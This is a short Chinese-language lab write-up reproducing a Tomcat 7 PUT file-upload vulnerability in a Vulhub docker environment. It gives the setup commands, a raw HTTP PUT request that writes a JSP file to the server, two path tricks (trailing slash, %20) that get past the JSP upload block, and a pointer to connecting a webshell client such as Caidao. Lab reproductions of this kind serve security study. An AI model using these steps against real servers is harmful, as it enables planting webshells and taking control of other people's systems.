靶机:Centos 7
攻击机:kali
影响范围:7.0.0-7.0.81
条件:web.xml中设置readonly false(不是默认配置)
步骤:
1、使用vuluhub的docker进行漏洞复现
Sudo docker-compose build(使用 build选项编译镜像)
- 启动docker容器docker-compose up -d
- 使用docker exec -ti dockerID bash 进入容器
- 查看web.xml是否配置readonly false cat conf/web.xml | grep readonly
- 抓包使用PUT方法写入文件成功,文件存放在ROOT目录下。
PUT /1.jsp/ HTTP/1.1
Host: your-ip:8080
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 5
shell
- 直接上传会被拦截绕过方法有两种第一种是/(linux),保存时是非法的符号会去除,第二种是%20,url编码是空格,保存时也会除去,使用两种方式都可以绕过。
- 使用菜刀或者其他webshell连接工具连接即可